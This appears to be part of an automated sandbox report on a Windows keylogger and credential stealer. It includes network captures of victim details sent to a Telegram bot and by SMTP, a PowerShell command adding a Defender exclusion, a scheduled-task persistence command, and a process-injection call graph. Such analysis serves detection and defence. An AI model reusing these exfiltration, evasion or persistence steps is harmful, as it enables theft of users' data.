                                                                              2024-10-07 06:51:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.449774188.114.96.34437540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:34 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-07 06:51:34 UTC682INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:34 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40229
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qdWa6gilLejy7OWT1fDPzyf9zh3zLn9CiotFOXEK9hRjxtoBtkpXpzQfe6K5aL1MydkSuU%2Fvdy%2FrlggI7so%2FSuHjfL%2Beu3ni2YBYwBFYdQnbOxY%2BGES0jiqSdyW1p5KB4%2FaJBpc3"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf6a45cd143a5-EWR
                                                                              2024-10-07 06:51:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.449775149.154.167.2204437540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:35 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2007/10/2024%20/%2014:46:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                              Host: api.telegram.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-07 06:51:35 UTC344INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0
                                                                              Date: Mon, 07 Oct 2024 06:51:35 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 55
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                              2024-10-07 06:51:35 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                              SMTP Packets

                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                              Oct 7, 2024 08:51:37.745800972 CEST5875012668.66.224.41192.168.2.4220-az1-ss20.a2hosting.com ESMTP Exim 4.96.2 #2 Sun, 06 Oct 2024 23:51:37 -0700
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Oct 7, 2024 08:51:37.746129990 CEST50126587192.168.2.468.66.224.41EHLO 445817
                                                                              Oct 7, 2024 08:51:37.895740986 CEST5875012668.66.224.41192.168.2.4250-az1-ss20.a2hosting.com Hello 445817 [8.46.123.33]
                                                                              250-SIZE 78643200
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPECONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Oct 7, 2024 08:51:37.904886961 CEST50126587192.168.2.468.66.224.41AUTH login aW5mb0BwcmVjaW91c3RvdWNoZm91bmRhdGlvbi5vcmc=
                                                                              Oct 7, 2024 08:51:38.054722071 CEST5875012668.66.224.41192.168.2.4334 UGFzc3dvcmQ6
                                                                              Oct 7, 2024 08:51:38.209263086 CEST5875012668.66.224.41192.168.2.4235 Authentication succeeded
                                                                              Oct 7, 2024 08:51:38.209459066 CEST50126587192.168.2.468.66.224.41MAIL FROM:<info@precioustouchfoundation.org>
                                                                              Oct 7, 2024 08:51:38.358776093 CEST5875012668.66.224.41192.168.2.4250 OK
                                                                              Oct 7, 2024 08:51:38.360194921 CEST50126587192.168.2.468.66.224.41RCPT TO:<info@precioustouchfoundation.org>
                                                                              Oct 7, 2024 08:51:38.519470930 CEST5875012668.66.224.41192.168.2.4250 Accepted
                                                                              Oct 7, 2024 08:51:38.519705057 CEST50126587192.168.2.468.66.224.41DATA
                                                                              Oct 7, 2024 08:51:38.669209003 CEST5875012668.66.224.41192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                              Oct 7, 2024 08:51:38.670322895 CEST50126587192.168.2.468.66.224.41.
                                                                              Oct 7, 2024 08:51:38.887080908 CEST5875012668.66.224.41192.168.2.4250 OK id=1sxhak-0005dz-1w
                                                                              Oct 7, 2024 08:51:41.383819103 CEST5875012768.66.224.41192.168.2.4220-az1-ss20.a2hosting.com ESMTP Exim 4.96.2 #2 Sun, 06 Oct 2024 23:51:41 -0700
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Oct 7, 2024 08:51:41.386785984 CEST50127587192.168.2.468.66.224.41EHLO 445817
                                                                              Oct 7, 2024 08:51:41.537774086 CEST5875012768.66.224.41192.168.2.4250-az1-ss20.a2hosting.com Hello 445817 [8.46.123.33]
                                                                              250-SIZE 78643200
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPECONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Oct 7, 2024 08:51:41.538089991 CEST50127587192.168.2.468.66.224.41AUTH login aW5mb0BwcmVjaW91c3RvdWNoZm91bmRhdGlvbi5vcmc=
                                                                              Oct 7, 2024 08:51:41.689100027 CEST5875012768.66.224.41192.168.2.4334 UGFzc3dvcmQ6
                                                                              Oct 7, 2024 08:51:41.850684881 CEST5875012768.66.224.41192.168.2.4235 Authentication succeeded
                                                                              Oct 7, 2024 08:51:41.850966930 CEST50127587192.168.2.468.66.224.41MAIL FROM:<info@precioustouchfoundation.org>
                                                                              Oct 7, 2024 08:51:42.001827002 CEST5875012768.66.224.41192.168.2.4250 OK
                                                                              Oct 7, 2024 08:51:42.002300024 CEST50127587192.168.2.468.66.224.41RCPT TO:<info@precioustouchfoundation.org>
                                                                              Oct 7, 2024 08:51:42.163007975 CEST5875012768.66.224.41192.168.2.4250 Accepted
                                                                              Oct 7, 2024 08:51:42.163177013 CEST50127587192.168.2.468.66.224.41DATA
                                                                              Oct 7, 2024 08:51:42.313908100 CEST5875012768.66.224.41192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                              Oct 7, 2024 08:51:42.315093040 CEST50127587192.168.2.468.66.224.41.
                                                                              Oct 7, 2024 08:51:42.531244993 CEST5875012768.66.224.41192.168.2.4250 OK id=1sxhao-0005eg-0m
                                                                              Oct 7, 2024 08:53:17.051337004 CEST50126587192.168.2.468.66.224.41QUIT
                                                                              Oct 7, 2024 08:53:17.402337074 CEST5875012668.66.224.41192.168.2.4221 az1-ss20.a2hosting.com closing connection
                                                                              Oct 7, 2024 08:53:20.861694098 CEST50127587192.168.2.468.66.224.41QUIT
                                                                              Oct 7, 2024 08:53:21.214482069 CEST5875012768.66.224.41192.168.2.4221 az1-ss20.a2hosting.com closing connection

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:02:51:14
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\2i3Lj7a8Gk.exe"
                                                                              Imagebase:0x6b0000
                                                                              File size:823'296 bytes
                                                                              MD5 hash:4CF3E3AD3BBFAF2B2950F501466FEFB7
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:02:51:16
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"
                                                                              Imagebase:0x390000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:02:51:16
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:02:51:16
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp"
                                                                              Imagebase:0x3f0000
                                                                              File size:187'904 bytes
                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:02:51:16
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:02:51:17
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\2i3Lj7a8Gk.exe"
                                                                              Imagebase:0xc70000
                                                                              File size:823'296 bytes
                                                                              MD5 hash:4CF3E3AD3BBFAF2B2950F501466FEFB7
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4140515962.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:7
                                                                              Start time:02:51:17
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              Imagebase:0xce0000
                                                                              File size:823'296 bytes
                                                                              MD5 hash:4CF3E3AD3BBFAF2B2950F501466FEFB7
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 79%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:02:51:19
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                              Imagebase:0x7ff693ab0000
                                                                              File size:496'640 bytes
                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:02:51:21
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp8686.tmp"
                                                                              Imagebase:0x3f0000
                                                                              File size:187'904 bytes
                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:02:51:21
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:02:51:21
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"
                                                                              Imagebase:0x130000
                                                                              File size:823'296 bytes
                                                                              MD5 hash:4CF3E3AD3BBFAF2B2950F501466FEFB7
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:02:51:21
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"
                                                                              Imagebase:0x3a0000
                                                                              File size:823'296 bytes
                                                                              MD5 hash:4CF3E3AD3BBFAF2B2950F501466FEFB7
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:02:51:21
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"
                                                                              Imagebase:0x8a0000
                                                                              File size:823'296 bytes
                                                                              MD5 hash:4CF3E3AD3BBFAF2B2950F501466FEFB7
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:10.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:192
                                                                                Total number of Limit Nodes:11
                                                                                execution_graph 26469 110d7c0 DuplicateHandle 26470 110d856 26469->26470 26634 1104960 26635 1104972 26634->26635 26638 110497e 26635->26638 26640 1104a70 26635->26640 26637 110499d 26645 11044fc 26638->26645 26641 1104a95 26640->26641 26649 1104b80 26641->26649 26653 1104b71 26641->26653 26646 1104507 26645->26646 26661 110608c 26646->26661 26648 110753f 26648->26637 26650 1104ba7 26649->26650 26652 1104c84 26650->26652 26657 110480c 26650->26657 26655 1104ba7 26653->26655 26654 1104c84 26654->26654 26655->26654 26656 110480c CreateActCtxA 26655->26656 26656->26654 26658 1105c10 CreateActCtxA 26657->26658 26660 1105cd3 26658->26660 26662 1106097 26661->26662 26665 11060dc 26662->26665 26664 11076d5 26664->26648 26666 11060e7 26665->26666 26669 110610c 26666->26669 26668 11077ba 26668->26664 26670 1106117 26669->26670 26673 110613c 26670->26673 26672 11078ad 26672->26668 26674 1106147 26673->26674 26676 1108b13 26674->26676 26679 110b1c0 26674->26679 26675 1108b51 26675->26672 26676->26675 26683 110d2a0 26676->26683 26688 110b1e7 26679->26688 26691 110b1f8 26679->26691 26680 110b1d6 26680->26676 26684 110d2d1 26683->26684 26685 110d2f5 26684->26685 26699 110d460 26684->26699 26703 110d44f 26684->26703 26685->26675 26689 110b207 26688->26689 26694 110b2e1 26688->26694 26689->26680 26693 110b2e1 GetModuleHandleW 26691->26693 26692 110b207 26692->26680 26693->26692 26695 110b324 26694->26695 26696 110b301 26694->26696 26695->26689 26696->26695 26697 110b528 GetModuleHandleW 26696->26697 26698 110b555 26697->26698 26698->26689 26700 110d46d 26699->26700 26701 110d4a7 26700->26701 26707 110cd88 26700->26707 26701->26685 26704 110d46d 26703->26704 26705 110d4a7 26704->26705 26706 110cd88 GetModuleHandleW 26704->26706 26705->26685 26706->26705 26708 110cd8d 26707->26708 26710 110ddb8 26708->26710 26711 110ceb4 26708->26711 26710->26710 26712 110cebf 26711->26712 26713 110613c GetModuleHandleW 26712->26713 26714 110de27 26713->26714 26714->26710 26462 6fdf378 26463 6fdf503 26462->26463 26465 6fdf39e 26462->26465 26465->26463 26466 6fdef68 26465->26466 26467 6fdf5f8 PostMessageW 26466->26467 26468 6fdf664 26467->26468 26468->26465 26620 6fdb158 26621 6fdb1a3 ReadProcessMemory 26620->26621 26623 6fdb1e7 26621->26623 26471 6fdb7ea 26472 6fdb7f4 26471->26472 26474 6fdb926 26471->26474 26473 6fdbaef 26474->26473 26477 6fddcb8 26474->26477 26491 6fddcb2 26474->26491 26478 6fddcd2 26477->26478 26479 6fddcda 26478->26479 26505 6fde3df 26478->26505 26509 6fde132 26478->26509 26514 6fdea13 26478->26514 26519 6fde363 26478->26519 26523 6fde0c1 26478->26523 26527 6fde1c6 26478->26527 26533 6fde204 26478->26533 26538 6fde44a 26478->26538 26543 6fde49a 26478->26543 26547 6fde6eb 26478->26547 26553 6fde53e 26478->26553 26479->26473 26492 6fddcda 26491->26492 26493 6fddcb6 26491->26493 26492->26473 26493->26492 26494 6fde3df 2 API calls 26493->26494 26495 6fde53e 2 API calls 26493->26495 26496 6fde6eb 2 API calls 26493->26496 26497 6fde49a 2 API calls 26493->26497 26498 6fde44a 2 API calls 26493->26498 26499 6fde204 2 API calls 26493->26499 26500 6fde1c6 2 API calls 26493->26500 26501 6fde0c1 2 API calls 26493->26501 26502 6fde363 2 API calls 26493->26502 26503 6fdea13 2 API calls 26493->26503 26504 6fde132 2 API calls 26493->26504 26494->26492 26495->26492 26496->26492 26497->26492 26498->26492 26499->26492 26500->26492 26501->26492 26502->26492 26503->26492 26504->26492 26558 6fded48 26505->26558 26563 6fded38 26505->26563 26506 6fde3fc 26506->26479 26510 6fde13f 26509->26510 26577 6fdb068 26510->26577 26581 6fdb060 26510->26581 26511 6fde178 26511->26479 26515 6fdea14 26514->26515 26517 6fdb068 WriteProcessMemory 26515->26517 26518 6fdb060 WriteProcessMemory 26515->26518 26516 6fdea43 26517->26516 26518->26516 26521 6fdb068 WriteProcessMemory 26519->26521 26522 6fdb060 WriteProcessMemory 26519->26522 26520 6fde38a 26520->26479 26521->26520 26522->26520 26585 6fdb2e4 26523->26585 26590 6fdb2f0 26523->26590 26528 6fde1e5 26527->26528 26529 6fde7c3 26528->26529 26594 6fda9e8 26528->26594 26598 6fda9e0 26528->26598 26529->26479 26530 6fde230 26530->26479 26534 6fde20a 26533->26534 26536 6fda9e8 ResumeThread 26534->26536 26537 6fda9e0 ResumeThread 26534->26537 26535 6fde230 26535->26479 26536->26535 26537->26535 26539 6fde46d 26538->26539 26541 6fdb068 WriteProcessMemory 26539->26541 26542 6fdb060 WriteProcessMemory 26539->26542 26540 6fdea43 26541->26540 26542->26540 26545 6fdaeca Wow64SetThreadContext 26543->26545 26546 6fdaed0 Wow64SetThreadContext 26543->26546 26544 6fde4b4 26545->26544 26546->26544 26548 6fde157 26547->26548 26549 6fde999 26548->26549 26551 6fdb068 WriteProcessMemory 26548->26551 26552 6fdb060 WriteProcessMemory 26548->26552 26550 6fde178 26550->26479 26551->26550 26552->26550 26554 6fde7f7 26553->26554 26602 6fded90 26554->26602 26607 6fded82 26554->26607 26555 6fde813 26559 6fded5d 26558->26559 26568 6fdaeca 26559->26568 26573 6fdaed0 26559->26573 26560 6fded73 26560->26506 26564 6fded48 26563->26564 26566 6fdaeca Wow64SetThreadContext 26564->26566 26567 6fdaed0 Wow64SetThreadContext 26564->26567 26565 6fded73 26565->26506 26566->26565 26567->26565 26569 6fdae83 26568->26569 26570 6fdaece Wow64SetThreadContext 26568->26570 26569->26560 26572 6fdaf5d 26570->26572 26572->26560 26574 6fdaf15 Wow64SetThreadContext 26573->26574 26576 6fdaf5d 26574->26576 26576->26560 26578 6fdb0b0 WriteProcessMemory 26577->26578 26580 6fdb107 26578->26580 26580->26511 26582 6fdb068 WriteProcessMemory 26581->26582 26584 6fdb107 26582->26584 26584->26511 26586 6fdb295 26585->26586 26587 6fdb2ea CreateProcessA 26585->26587 26586->26479 26589 6fdb53b 26587->26589 26589->26589 26591 6fdb379 CreateProcessA 26590->26591 26593 6fdb53b 26591->26593 26593->26593 26595 6fdaa28 ResumeThread 26594->26595 26597 6fdaa59 26595->26597 26597->26530 26599 6fdaa28 ResumeThread 26598->26599 26601 6fdaa59 26599->26601 26601->26530 26603 6fdeda5 26602->26603 26612 6fdafa8 26603->26612 26616 6fdafa0 26603->26616 26604 6fdedc4 26604->26555 26608 6fdeda5 26607->26608 26610 6fdafa8 VirtualAllocEx 26608->26610 26611 6fdafa0 VirtualAllocEx 26608->26611 26609 6fdedc4 26609->26555 26610->26609 26611->26609 26613 6fdafe8 VirtualAllocEx 26612->26613 26615 6fdb025 26613->26615 26615->26604 26617 6fdafa5 VirtualAllocEx 26616->26617 26619 6fdb025 26617->26619 26619->26604 26624 110d578 26625 110d5be GetCurrentProcess 26624->26625 26627 110d610 GetCurrentThread 26625->26627 26628 110d609 26625->26628 26629 110d64d 